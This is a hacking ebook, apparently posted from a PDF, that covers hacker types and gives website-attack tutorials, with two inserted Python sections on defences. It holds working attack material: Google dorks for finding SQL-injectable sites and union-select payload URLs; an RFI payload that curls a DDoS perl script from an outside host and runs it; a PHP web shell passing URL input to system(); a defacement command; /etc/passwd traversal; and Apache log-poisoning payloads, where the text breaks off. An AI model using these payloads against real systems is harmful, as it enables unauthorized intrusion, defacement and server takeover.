The Most In-depth Hacker's Guide (PDF; source: pdf.ebook777.com/038/b019cwaa9w.pdf; uploaded by duonglien, posted 04-Jul-2018)

The Most In-depth Hacker's Guide - By: Dawood Khan aka "Aleri0n V0RT3X" (Volume: 1)

The book or volume "The Most In-Depth Hacker's Guide: Volume 1" is tremendously complex to write, particularly without the support of the Almighty GOD Allah. I express heartfelt credit to my parents, without whom I have no existence. I am more than ever thankful to my teacher Sir Khair Ullah for the inspiration which I got to write the book. I am also thankful to my friends and partner who facilitated me. To finish, I am thankful to you also, as you are reading this book. I am sure this book will play a creative and constructive role in building your life more secure and alert than ever before.

Who am I? You might have come across the term ethical hacker? The good guy? Yes, that's exactly what I like to call myself. For hacking you need to have a basic knowledge of programming. Someone asked me, "How did you take interest in programming and hacking?" It was more like an inspiration that I got from my brother. My first ever attempt at programming was making a simple page in HTML with a big "Hello world" in it. To which of course my father smiled and said, "well done." Then came hacking. My hacking career started back in 2009. 7 years passed and there is still so much to learn. My sole purpose with this book is not to sell it but to raise awareness of the danger we face today, and yes, to help teach people about the hackers' tradition. :)

"By learning you will teach, by teaching you will learn"

- Latin Proverb

Copyright Notice

This report may not be copied or reproduced unless specific permissions have been personally given to you by the author Dawood Khan. Any unauthorized use, distributing, reproducing is strictly prohibited.

Liability Disclaimer

The information provided in this eBook is to be used for educational purposes only. The eBook creator is in no way responsible for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word "Hack" or "Hacking" in this eBook should be regarded as "Ethical Hack" / "Ethical hacking" respectively. You implement the information given at your own risk.

This book is totally meant for providing information on "Computer Security", "Computer Programming" and other related topics and is in no way related to the terms "CRACKING" or "HACKING" (Unethical).

A few articles (tutorials) in this book may contain information related to "Hacking Passwords" or "Hacking Email Accounts" (or similar terms). These are not GUIDES to hacking. They only provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorized access. However, you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal.

Some of the tricks provided by us may no longer work due to fixes for the bugs that enabled the exploits. The author is not responsible for any direct or indirect damage caused by the usage of the hacks provided in the book.

Contents: The Most In-depth Hacker's Guide

Chapter One: Introduction

What is a Hacker?

Types of Hackers

What does it take to become a Hacker?

Chapter Two: Website Hacking

Understanding SQL Injection

How to Use/Create Dorks

Finding Columns & the Vulnerable Columns

Obtaining the SQL Version

Obtaining Tables and Columns

Understanding RFI

Advanced RFI using PHP streams

Understanding LFI

Exploiting LFI Vulnerabilities

Understanding XSS

XSS Attack

Understanding Broken Authentication and Session Management

Brute Force Attack

Session Hijacking

Understanding DNS Cache Poisoning

DNS Background

Cache poisoning without response forgery

Blind response forgery using birthday attack

Understanding Heartbleed

Heartbleed Vulnerability

The Impact of Heartbleed

Scanning Methodology

Impact on Popular Websites

Chapter Three: Remote Administration Tool

What is a RAT?

How to set up RAT

How is it being distributed?

Chapter Four: Keylogger

What is a Keylogger?

Keylogger Applications

How to set up Keylogger

Remotely installing Keylogger using Meterpreter

Chapter Five: Botnets and IRC Bots

Understanding Botnets and IRC Bots

Types of Botnets

Formation of Botnet/IRC Bots

Types of attacks

How to set up Botnet

How to set up IRC Botnet?

Chapter Six: Cryptography, Encryption, and Decryption

Understanding Cryptography

Historical Background (Cryptography)

Data Encryption and Decryption

Symmetric and Asymmetric Encryption

Secure Communications Equals Better Privacy

Cryptographic Hash Function

Files Encryption and Decryption

Term 'Crypter' (Encryption software)

Chapter Seven: Introduction to Penetration Testing

What is Penetration test?

History (Penetration Testing)

Multiple Penetration Testing Tools

How to Conduct Penetration Testing?

Chapter Eight: Decompiling and Reverse Engineering

What is Reverse Engineering?

Reasons for Reverse Engineering

Types of Reverse Engineering

Software Obfuscation

What are .NET Decompilers?

Some tools for Reverse Engineering

Chapter One: Introduction

What is a Hacker?

In the computer security context, a hacker is someone who likes to tinker with electronics or computer systems. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren't intended to do. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, enjoyment, or to evaluate weaknesses in order to assist in removing them.

Several subgroups of the computer underground with different attitudes use different terms to demarcate themselves from each other, or try to exclude some specific group with whom they do not agree.

Types of Hackers

White Hat: These are considered the good guys. White hat hackers don't use their skills for illegal purposes. They usually become computer security experts and help protect people from the Black Hats. The term "white hat" in Internet slang refers to an ethical hacker. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement.

"A white hat hacker is a computer security specialist who breaks into protected systems and networks to test and assess their security. White hat hackers use their skills to improve security by exposing vulnerabilities before malicious hackers (known as black hat hackers) can detect and exploit them." - Definition from Techopedia

Black Hat: These are considered the bad guys. Black hat hackers usually use their skills maliciously for personal gain. They are the people that hack banks, steal credit cards, and deface websites. Black hat hackers break into secure networks to destroy, modify, or steal data, or to make the network unusable for those who are authorized to use it. Black hat hackers are also referred to as "crackers" within the security industry and by modern programmers. These two terms (White hat & Black hat) came from the old western movies where the good guys wore white hats and the bad guys wore black hats.

"A black hat hacker is an individual with extensive computer knowledge whose purpose is to breach or bypass internet security. Black hat hackers are also known as crackers or dark-side hackers. The general view is that, while hackers build things, crackers break things." - PC Tools

Grey Hat: The term "grey hat" or "gray hat" in Internet slang refers to a computer hacker or computer security expert whose ethical standards fall somewhere between purely altruistic and purely malicious. The term began to be used in the late 1990s, derived from the concepts of "white hat" and "black hat" hackers. A grey hat hacker may surf the Internet and hack into a computer system for the sole purpose of notifying the administrator that their system has a security defect, for example. They may then offer to correct the defect for a fee. Even though grey hat hackers may not necessarily perform hacking for their personal gain, unauthorized access to a system can be considered illegal and unethical.

Neophyte: A neophyte ("newbie", or "noob") is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology and hacking. The word neophyte means "a person who is new to a subject or activity."

Script Kiddie: These are the wannabe hackers. They are looked down upon in the hacker community because they are the people that make hackers look bad. Script kiddies usually have no hacking skills and use the tools developed by other hackers without any knowledge of what's happening behind the scenes.

Intermediate Hackers: These people usually know about computers and networks, and have enough programming knowledge to understand roughly what a script might do, but like the script kiddies they use pre-developed, well-known exploits (a piece of code that takes advantage of a bug or vulnerability in a piece of software and allows you to take control of a computer system) to carry out attacks.

Elite Hacker: These are the skilled hackers. They are the ones that write the many hacker tools and exploits out there. They can break into systems and hide their tracks or make it look like someone else did it. You should strive to eventually reach this level. Elite groups such as Masters of Deception conferred a kind of credibility on their members.

Hacktivist: A hacktivist is a hacker who utilizes technology to publicize a social, ideological, religious or political message. Hacktivism can be divided into two main groups:

Nation State: Intelligence agencies and cyber-warfare operatives of nation states.

Organized Criminal Gangs: Groups of hackers that carry out organized criminal activities for profit.

What does it take to become a Hacker?

Becoming a great hacker isn't easy and it doesn't happen quickly. Being creative helps a lot. There is more than one way a problem can be solved, and as a hacker you encounter many problems. The more creative you are, the bigger chance you have of hacking a system without being detected. Another huge quality you must have is the will to learn, because without it you will get nowhere. Remember, knowledge is power. Patience is also a must, because many topics can be difficult to grasp and only over time will you master them.

Think creatively. Hackers are like artists, philosophers, and engineers all rolled up into one. They believe in freedom and mutual responsibility. The world is full of fascinating problems waiting to be solved. Hackers take a special delight in solving problems, sharpening their skills, and exercising their intelligence.

Learn to love solving problems. No problem should ever have to be solved twice. Think of it as a community in which the time of hackers is precious. Hackers believe sharing information is a moral responsibility. When you solve problems, make the information public to help everyone solve the same issue.

Learn to recognize and fight authority. The enemy of the hacker is boredom, drudgery, and authoritarian figures who use censorship and secrecy to strangle the freedom of information. Monotonous work keeps the hacker from hacking.

Be competent. Anyone who spends time on Reddit can write up a ridiculous cyberpunk username and pose as a hacker. But the Internet is a great equalizer, and values competence over ego and posture. Spend time working on your craft and not your image and you'll more quickly gain respect than by modeling yourself on the superficial things we think of as "hacking" in popular culture.

Chapter Two: Website Hacking

Understanding SQL Injection

SQL Injection is one of today's most powerful methods of system penetration. Using error-based queries, one is able to extract data (tables & columns) from a vulnerable system, namely the database.

Beginners tend to believe that using tools created by advanced SQL injection artists is the best way around things. Please believe that it isn't. Everything seems nice and easy with tools such as BSQLi and SQLi Helper, which they are, but the users posting the download links for both applications around the world on hacking forums have been known to very securely encrypt these tools with malicious files or backdoors etc. I've experienced this firsthand when I first started out. Learning everything manually will help you understand the environment you are attempting to penetrate, whilst experimenting with commands you have learnt will only help you become more advanced in SQL injection. As for tricks, there are many articles named "Cheat Sheets", because this is what they are: purposely created for SQL injectors to use commands which aren't normally spoken of or known about.

Requirements: When I first started SQL injection, personally for me it wasn't too hard to get on the ball and learn quickly. This is because I had previous knowledge of web scripts, how the internet works, and the ability to read and understand complicated tutorials. I believe it's a whole lot easier if you know the basics of a computer system and how the internet works. To learn you must be able to read and understand the tutorial or article provided and take on board everything you see. When I was a beginner I found it easier to attack whilst reading: do everything in stages, don't read the whole tutorial and go off and expect to inject off the top of your head.

How to Use/Create Dorks

For beginners, a method of finding websites vulnerable to SQL injection is using what we call "dorks". Dorks are like search criteria for which a search engine returns results related to your dork. The process can be a little time consuming, but the outcome will be worth it after learning how to use dorks. For this tutorial, the search engine we'll be using is Google.

Step 1: For this tutorial, we'll be using this dork: "inurl:index.php?id=". Here's what you do: Navigate to http://www.google.com. Type the dork in the search bar, "inurl:index.php?id=" (with or without quotes).

Now you'll find a whole lot of links in your results.

Here's how you can speed up your process: On your mouse, there should be a scroll button, right? Hover your mouse on each link and hit the scroll button so that it'll open in a new tab. (Let's say you can open about 10 links at a time.)

Step 2: Now to see whether the website is vulnerable to SQL injection or not, we simply put a quote (') at the end of the URL address. So our site will look like this:

Do the same thing with the websites you opened in your tabs and see if there's any vulnerable website. To determine if a website is vulnerable or not: it should return an error!

Step 3: That's all! You have just discovered a vulnerable website and you can now exploit it.

Here's a list of dorks:

1. index.php?id=

2. trainers.php?id=

3. buy.php?category=

4. article.php?ID=

5. play_old.php?id=

6. declaration_more.php?decl_id=

7. pageid=

8. games.php?id=

9. page.php?file=

10. newsDetail.php?id=

11. gallery.php?id=

12. show.php?id=

13. staff_id=

14. newsitem.php?num=

15. readnews.php?id=

Finding Columns & the Vulnerable Columns

As I noted in the first section of the tutorial, I advise you to do pretty much everything manually with SQL injection, so by using the following commands (providing they're followed correctly) you will begin to see results in no time, if the site is vulnerable. For example:

Step 1: Refer to the following to check how many columns there are. (order+by) The ORDER BY clause tells the database to order the result by a column position (an integer, e.g. 1 or 2). No error returned means the column is there; if an error is returned the column isn't there.

1. wxw.site.com/index.php?Client_id=23+order+by+1 < No Error

2. wxw.site.com/index.php?Client_id=23+order+by+2 < No Error

3. wxw.site.com/index.php?Client_id=23+order+by+3 < No Error

4. wxw.site.com/index.php?Client_id=23+order+by+4 < ERROR

Using the order+by+ command and incrementing the number each time until the page displays an error is the easiest method to find the columns. From the examples above, when attempting to order the columns by 4 there's an error, so column 4 doesn't exist, so there are 3 columns.

Step 2: Let's say we were working on the site I used above, which has 3 columns. We now need to find out which of those three columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. (union+select) selects all columns provided in the URL and returns the value of the vulnerable column, e.g.

● wxw.site.com/index.php?Client_id=23+union+select+1,2,3

The site should refresh, not with an error but with some content missing, and a number is displayed on the page, either 1, 2 or 3 (as we selected the three columns in the above URL to test for column vulnerability). Sometimes the page will return and look completely normal, which isn't a problem.

Obtaining the SQL Version

Easier said than done. Using the information found in the above sections, e.g. the number of columns and the vulnerable column, we now use a command (@@version) and in some cases a series of commands to determine what the SQL version is on the current site: version 4 or version 5. See the example below to view what a URL should look like when the version command has been inserted into the URL, replacing the number 2, as 2 is the vulnerable column on the example site.

● wxw.site.com/index.php?Client_id=-23+union+select+1,@@version,3

What you need to look for is a series of numbers, e.g.: 5.0.89-community, 4.0.45-log

If the above fails and the site just returns an error or displays normally, then we need to use the convert function in order for the server to understand the command. Don't worry though, this is usually the only thing you need to convert and it's on a rare occasion where this is the case. So, if the example site returned an error we need to replace @@version with the convert() function: convert(@@version using latin1)

So the example site will now look like this:

● wxw.site.com/index.php?Client_id=-23+union+select+1,convert(@@version+using+latin1),3

Obtaining Tables and Columns

Step 1: You will notice that obtaining tables and columns from version 4 MySQL servers is a little more time consuming and confusing at times, as we have to guess pretty much everything. Version 5 is more up to date and has information_schema, in which the databases and tables are listed; MySQL version 4 doesn't. Providing the MySQL version of the website is 4, we must do the following.

So, back to the example URL:

● wxw.site.com/index.php?Client_id=23+union+select+1,@@version,3

We must now go back to the original URL which is:

● wxw.site.com/index.php?Client_id=23+union+select+1,2,3

Step 2: This is where the guessing begins; we need to guess table names. How can we tell if the table name I guess exists? The same way as where we tested for the number of columns. If no error is produced then the table guessed exists. If there is an error then the table guessed doesn't exist, so just try another. So we use the (from) command followed by the table name you are looking to see exists. Example:

● wxw.site.com/index.php?Client_id=23+union+select+1,2,3+from+admin

Step 3: We are now required to guess column names from the existing table. So, thinking logically, which labelled columns within this table would represent data? Columns such as: first_name, last_name, email, username, password, pass, user_id, etc.

So we now must think back to which column is vulnerable (in this case 2), and so we'll use the URL and replace 2 with the column name you are attempting to see if it exists in the users table. Let's try a few of the typical ones listed above:

1. wxw.site.com/index.php?Client_id=23+union+select+1,f_name,3+from+users < Error

2. wxw.site.com/index.php?Client_id=23+union+select+1,l_name,3+from+users < Error

3. wxw.site.com/index.php?Client_id=23+union+select+1,address1,3+from+users < Error

4. wxw.site.com/index.php?Client_id=23+union+select+1,email,3+from+users < No Error

From the above we can clearly see that the column email exists within the table users; the page should return displaying data (most probably an email address) or whatever data you are extracting.
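Every URL in this chapter works for one reason: the id taken from the query string is glued straight into the SQL text, so "order by 4" and "union select 1,2,3" are parsed as SQL rather than compared as a value. The following is an added example, not code from the book: the concatenation pattern next to its fix, run against a constructed in-memory table with Python's sqlite3 module (SQLite stands in for the MySQL server the book targets; the schema, the table name `clients`, the sample row and the helper names are all assumptions made for the demonstration). The `probe` helper reduces each request to the three outcomes the chapter reads off the page, rows, error or empty, so both implementations can be compared on the same payloads.

```python
import sqlite3

# Constructed in-memory database standing in for the book's example site.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (id INTEGER, name TEXT, email TEXT)")
    conn.execute("INSERT INTO clients VALUES (23, 'Client 23', 'client23@example.com')")
    conn.commit()
    return conn

def vulnerable_lookup(conn, client_id):
    # The pattern behind every URL in this chapter: the raw parameter is pasted
    # into the statement, so 'order by' and 'union select' become part of the SQL.
    sql = "SELECT id, name, email FROM clients WHERE id = " + client_id
    return conn.execute(sql).fetchall()

def safe_lookup(conn, client_id):
    # The same query with a bound parameter. The value travels separately from
    # the statement text and is never parsed as SQL, whatever it contains.
    sql = "SELECT id, name, email FROM clients WHERE id = ?"
    return conn.execute(sql, (client_id,)).fetchall()

def probe(lookup, conn, payload):
    # Reduce the outcome to what the book reads off the page: an error,
    # the normal rows, or a page with nothing in it.
    try:
        rows = lookup(conn, payload)
    except sqlite3.Error:
        return "error"
    return "rows" if rows else "empty"

# The probes the chapter uses to count columns and find the vulnerable one.
PROBES = ["23", "23 order by 3", "23 order by 4", "23 union select 1,2,3"]

def compare():
    # Returns {payload: (outcome with concatenation, outcome with bound parameter)}
    conn = make_db()
    return {p: (probe(vulnerable_lookup, conn, p), probe(safe_lookup, conn, p)) for p in PROBES}

if __name__ == "__main__":
    for payload, (vuln, safe) in compare().items():
        print(f"{payload!r:28} concatenated={vuln:6} parameterised={safe}")
```

With concatenation, "order by 4" errors and "union select 1,2,3" appends a row, which is exactly the signal the chapter teaches you to look for; with the bound parameter every probe is just a client id that does not exist and the page looks the same as for any unknown id. The same holds for MySQL through prepared statements (PDO or mysqli): the @@version and convert() tricks never reach the parser either.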

Understanding RFI

Remote File Inclusion (RFI) is an attack that targets the computer servers that run websites and their applications. RFI exploits are most often attributed to the PHP programming language used by many large firms including Facebook and SugarCRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference external scripts indicated by user input without proper sanitation. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

Detailed Description

Remote File Inclusion (RFI) is caused by insufficient validation of user input provided as parameters to a web application. Parameters that are vulnerable to RFI enable an attacker to include code from a remotely hosted file in a script executed on the application's server. Since the attacker's code is thus executed on the web server, it might be used for temporary data theft or manipulation, or for a long-term takeover of the vulnerable server.

The RFI attack vector includes a URL reference to the remotely hosted code. Most attacks include two steps. In the first step, the attack vector references a simple validation script, usually capable of printing some distinguished output to the HTML page. If the validation script is successfully executed by the server under attack, then the attacker proceeds with a second vector that references the actual payload script. The servers hosting the script are either compromised servers or file sharing services.

Step 1: The included file indicates that the application is vulnerable to RFI. For example:

● <?php /*ZFxID*/ echo("Shiro"."Hige"); die("Shiro"."Hige"); /*ZFxID*/ ?>

Step 2: The attack vector includes the actual payload script. For example:

● <?php echo exec('cd /tmp;curl -O http://www.yeshouse.net/column/js/ddos.txt;perl ddos.txt;rm -rf ddos.txt*;'); ?>

Prevention

The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web Application Firewall (WAF). Detection and blocking of such attacks can be enhanced by creating a blacklist of attack sources and a blacklist of URLs of remotely included malicious scripts:

1. Advance knowledge of RFI attack sources enables the WAF to block an attack before it even begins.

2. A blacklist of the referenced URLs enables the WAF to block exploits targeting zero-day vulnerabilities of applications.

3. The blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.

Using RFI to Exploit a Website

RFI is a common vulnerability and, trust me, all website hacking is not exactly about SQL injection. Using RFI you can literally deface websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one; some BASH might come in handy as most servers today are hosted on Linux.

Starting with RFI

Let's get it started. The first step is to find a vulnerable site; you can easily find them using Google dorks. If you don't have any idea, you might want to read about advanced password hacking using Google dorks or use an automated tool to apply Google dorks using Google. Now let's assume we have found a vulnerable website.

● http://victimsite.com/index.php?page=home

As you can see, this website pulls documents stored in text format from the server and renders them as web pages. We can find ways around it as it uses the PHP include function to pull them out. Let's check it out.

● http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

I have included a custom script "evilscript" in text format from my website, which contains some code. Now, if it's a vulnerable website, then any of these 3 things can happen.

1. You might have noticed that the URL consisting of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include evilscript.txt.txt'. This might happen as the site may be automatically adding the .txt extension to the pages stored on the server.

2. In case it automatically appends something along the lines of .php, then we have to use a null byte '%00' in order to avoid the error.

3. Successful execution.

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this, knowledge of PHP might come in handy. Here we go:

<?php
echo "<script>alert('U 4r3 0wn3d!!');</script>";
echo "Run command: " . htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);
?>

The above code allows you to exploit the include function and tests if the site is RFI (XSS) vulnerable by running the alert box code, and if successful, you can send custom commands to the Linux server in bash. So, if you are in luck and it worked, let's try our hands on some Linux commands. For example, to find the current working directory of the server and then to list files, we will be using the 'pwd' and 'ls' commands:

● http://victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

● http://victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

What it does is that it sends the command as cmd to the script we put in, and begins to print the working directory and list the documents. Even better, you can almost make the page proclaim that you hacked it by using the 'echo' command.

● cmd=echo Ur pwn3d by Aleri0n > index.php

It will then re-write the index.php and render it. In case it's a primitive website which stores pages with the .txt extension, you might want to put it in along with the .txt files. Now, as expected, we are the alpha and the omega of the website. We can download, remove, rename, anything! Want to download stuff? Try the 'wget' function.

Advanced RFI using PHP streams

Streams are a way of generalizing file, network, data compression, and other operations that share a common set of functions and uses.

An attacker may use streams to exploit RFI vulnerable parameters.

From the attacker's perspective, there are two main advantages of using alternative streams and wrappers instead of the "normal" HTTP wrapper.

● Evasion technique: Some defense mechanisms and filters block only the use of the "normal" wrappers. Using an alternative wrapper will evade them.

● Some streams eliminate the need for hosting the malicious code, which makes the hacker's work easy.

Attack example:

For example, we will use the data PHP wrapper.

We will encode our PHP code (<?php phpinfo()?>) in base64 to get the following string "PD9waHAgcGhwaW5mbygpPz4=", then we will wrap it with the data wrapper, "data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=", and send it to the vulnerable application.

We have observed the use of PHP wrappers in RFI exploitation in the wild, but they are much less frequent than the traditional RFI exploits.

Understanding LFI

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. The LFI exploitation method requires an additional vulnerability (with respect to RFI) in the application to allow the existence of a local malicious file.

The reason that hackers bother with LFI attacks when they could use the simpler RFI attacks is due to a unique property in PHP version 5.2. Specifically, PHP introduced an additional control mechanism over remote file include in the form of the allow_url_include switch. The default value of the switch is OFF, which turns applications that were previously RFI vulnerable into only LFI vulnerable ones.

Since about 90% of deployed PHP enabled servers are of version 5.2 or above, it makes LFI a very relevant option for hackers.

Even though LFI exploitation methods may differ from RFI in the technical details, the outcome is very similar: the attacker's code is executed on the web server. The code might be used for temporary data theft or manipulation, or for a long-term takeover of the vulnerable server.

LFI vulnerability exploitation requires the malicious code to be hosted on the vulnerable server. There are two main paths to do that.

● Abuse existing file write functionality within the server, typically done by manipulating the server into writing attacker controlled strings into the system log file.

● Abuse user generated content file upload functionality to embed malicious code within the uploaded file.

Let's create a new scenario. We've got the following files/pages:

1. index.php

2. 1.php

3. 2.php

4. 3.php

"index.php" is the file the users are going to visit with their browser. When the user first visits index.php we are going to display 3 links.

<a href="index.php?page=1">Page 1</a>

<a href="index.php?page=2">Page 2</a>

<a href="index.php?page=3">Page 3</a>

When the user clicks the first link it's going to show the content of 1.php, when the user clicks the second link it's going to show the contents of 2.php and when the user clicks the last link it's going to show the contents of 3.php.

The index.php script would in this case look something like this (note that I am now coding like an idiot to create security holes):

<?php
if (isset($_GET['page']))
{
    // The GET argument is present. Let's include the page.
    include($_GET['page'] . ".php");
}
else
{
    // The GET argument is not present. Let's give the poor guy some links!
    echo('<p><a href="index.php?page=1">Page 1</a></p>');
    echo('<p><a href="index.php?page=2">Page 2</a></p>');
    echo('<p><a href="index.php?page=3">Page 3</a></p>');
}
?>

The content of 1, 2 and 3 is not important in this example so I won't say anything about that.

Now, when a user clicks the Page 1 link he or she is taken to www.site.com/index.php?page=1

The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL GET argument + ".php"; the same goes for 2 and 3.

So, for Page 1 it will include 1.php, for Page 2 it will include 2.php and for Page 3 it will include 3.php.

So far, so good. Right? Not really. The above script is a death trap. You might not see it, but I do. And I will show you. What if I were to go to index.php?page=4? It would then try to include 4.php. But that file obviously does not exist. So the page would return an error message like this:

● Warning: include(4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3

It's important to note that not all web servers will show you error messages when there are errors. You can choose to not show users error messages on purpose, so it's harder to find vulnerable pages and they give out less information about what's happening in the code. Either way, let's see what more we can do with this.

Before we continue: From now on, I will be using Linux/Unix paths (/var/log/) and not c:\blabla. In case of vulnerabilities on Windows servers, the concept remains the same. Just change the path.

If I were to go to index.php?page=/etc/passwd%00 what would happen? That's right, the PHP script would try to include whatever the file /etc/passwd contains. And if /etc/passwd were to contain more PHP code, it would also get executed. Meaning we can run any PHP command/function on the server. Which most definitely is extremely dangerous. However, in this example (/etc/passwd) we won't have any PHP code. But it will contain all the users on the server. /etc/passwd is typically the file you will try to include first in any LFI, simply because it will always be there on Linux servers.

Do you see the %00 part in the argument value? Yeah, that is not a typo. This is to get rid of the '.php' part of the include code. Everything after %00 will be discarded.
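The index.php above has two defects at once: it takes the page name from the user unchecked, and the ".php" it appends can be cut off with %00. The following is an added example, not code from the book, written in Python rather than PHP so it can be run anywhere: a `resolve_page` helper that accepts only the three page names the script actually links to and then, as a second line of defence, resolves the path and confines it to the page directory. `why_rejected`, `page_from_query` and the temporary page directory built in `demo()` are constructed for the example and are not part of the book's scenario.

```python
import os
import tempfile
from urllib.parse import unquote

# The only pages index.php is meant to include (the three links the book shows).
ALLOWED_PAGES = {"1", "2", "3"}

def why_rejected(page):
    """Return the reason a ?page= value is refused, or None if it is acceptable.

    The checks are ordered so that each payload from this chapter trips a
    different one; with an allow-list the order does not change the outcome.
    """
    if "\x00" in page:
        return "null byte"
    if page.startswith(("/", "\\")) or (len(page) > 1 and page[1] == ":"):
        return "absolute path"
    if ".." in page:
        return "traversal"
    if page not in ALLOWED_PAGES:
        return "not an allowed page"
    return None

def resolve_page(base_dir, page):
    # Allow-list first. Then confine the resolved path to base_dir so that a
    # symlink, or a careless future addition to the list, still cannot escape.
    reason = why_rejected(page)
    if reason:
        raise ValueError(reason)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("resolved path escapes base directory")
    if not os.path.isfile(target):
        raise ValueError("page file missing")
    return target

def page_from_query(query):
    # Mirror what PHP hands the script: the URL-decoded value of ?page=
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "page":
            return unquote(value)
    return ""

# Query strings taken from this chapter (the legitimate one plus the attacks).
REQUESTS = [
    "page=1",
    "page=4",
    "page=/etc/passwd%00",
    "page=../../../../etc/passwd",
    "page=/proc/self/environ",
]

def demo():
    # Constructed page directory holding 1.php, 2.php, 3.php so the example runs offline.
    with tempfile.TemporaryDirectory() as d:
        for name in ALLOWED_PAGES:
            with open(os.path.join(d, name + ".php"), "w") as f:
                f.write("<p>page %s</p>" % name)
        results = {}
        for q in REQUESTS:
            try:
                results[q] = os.path.basename(resolve_page(d, page_from_query(q)))
            except ValueError as e:
                results[q] = "rejected: " + str(e)
        return results

if __name__ == "__main__":
    for query, outcome in demo().items():
        print(f"{query:32} -> {outcome}")
```

Each payload from this chapter trips a different check: the null byte, the absolute path to /etc/passwd or /proc/self/environ, the ../ chain, and the unknown page 4 that produced the telling warning message. The allow-list alone refuses all of them; the realpath confinement is there for the day someone extends the list with a name they did not think about.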

Exploiting LFI Vulnerabilities

Let's say that you have successfully found a vulnerable page. The URL is www.site2.com/index.php?page=index

First I will discuss the normal method of LFI vulnerabilities. Then I will move on to slightly more interesting methods of gaining some sort of access to the server. We have to remember: even though we might have an LFI vulnerability, this does not directly mean we have hacked our target, nor does it guarantee a successful breach.

For the sake of simplicity, we will say that all we need to do is edit the page=index to /etc/passwd and we will successfully include /etc/passwd. Nothing fancy. In a lot of cases it will be necessary to do ../../../../../../../../../etc/passwd because the PHP script will try to include something in its root directory, so we need to go back lots of folders (../../../) until we reach / and then go to etc/ and read passwd. How many ../'s you use does not matter. Just use enough.

If you're lucky enough, www.site2.com/index.php?page=/etc/passwd should give us this output:

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

lp:x:7:7:lp:/var/spool/lpd:/bin/sh

mail:x:8:8:mail:/var/mail:/bin/sh

news:x:9:9:news:/var/spool/news:/bin/sh

uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

proxy:x:13:13:proxy:/bin:/bin/sh

www-data:x:33:33:www-data:/var/www:/bin/sh

list:x:38:38:Mailing List Manager:/var/list:/bin/sh

Note that you will not get the same output (you might, but probably not). Don't worry. As long as you get something looking like this you are good.

So, we know this server for SURE is vulnerable to LFI. Let's discuss how we can get some access to this server. The file /etc/shadow is what contains the system's logins nowadays. But unless the web server is running as root (the highest privilege user) you won't be able to read that file. But you should/could try it nonetheless.

Furthermore, there isn't really any easy way of getting more access than LFI to a server with normal inclusion. You can try lurking around a bit and see if you find any interesting files; you might get lucky. But normally, from this point on you move on to log poisoning, /proc/self/environ or other methods of attack.

Log poisoning

After knowing you can include any file(s) with an LFI, you could try log poisoning to execute PHP code to gain higher access to the system.

In order to perform LFI log poisoning you need to be able to include the Apache error and/or access logs. Unfortunately for us, I believe this has been made "impossible" in newer versions of Apache (the most used web server). Nonetheless, it does not stop us from trying.

First, try including various known locations for the Apache logs. Here are a few common paths:

/etc/httpd/logs/acces_log

/etc/httpd/logs/access.log

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/var/www/logs/access_log

/var/www/logs/access.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/var/log/apache/access_log

/var/log/apache2/access_log

/var/log/apache/access.log

/var/log/apache2/access.log

/var/log/access_log

/var/log/access.log

/var/www/logs/error_log

/var/www/logs/error.log

/usr/local/apache/logs/error_log

/usr/local/apache/logs/error.log

/var/log/apache/error_log

/var/log/apache2/error_log

/var/log/apache/error.log

/var/log/apache2/error.log

/var/log/error_log

/var/log/error.log

These are the most common ones, as said. But you might find yourself in a lot of situations where things are not where they commonly are. If you find yourself failing on all of those common paths for the logs, just give up and move on to another method of attack. Most likely, you won't find the log path or you can't read it.

However, if you do manage to include the error and/or access log, you will most likely crash your browser if you are exploiting a huge site. Or you will see tons and tons and tons of access or error logs. In this case, read further (even if your browser crashes).

Now, the whole point of including the error and/or access log(s) is to be able to include something we can modify. Because we can easily modify the access or error logs!

What we want to do is "poison" the logs with PHP code, then include them with the LFI and thereby execute the code! All you need to do is go to www.site2.com/<?php system("echo include($_GET['a']); > /tmp/mmmmmmm") ?> and you will poison the error log (because the file <?php system("echo include($_GET['a']); > /tmp/mmmmmmm") ?> will most likely not exist and therefore make a 404 error).

If done correctly, you will now execute the following code by including the error log:

<?php
system("echo include($_GET['a']); > /tmp/mmmmm")
?>

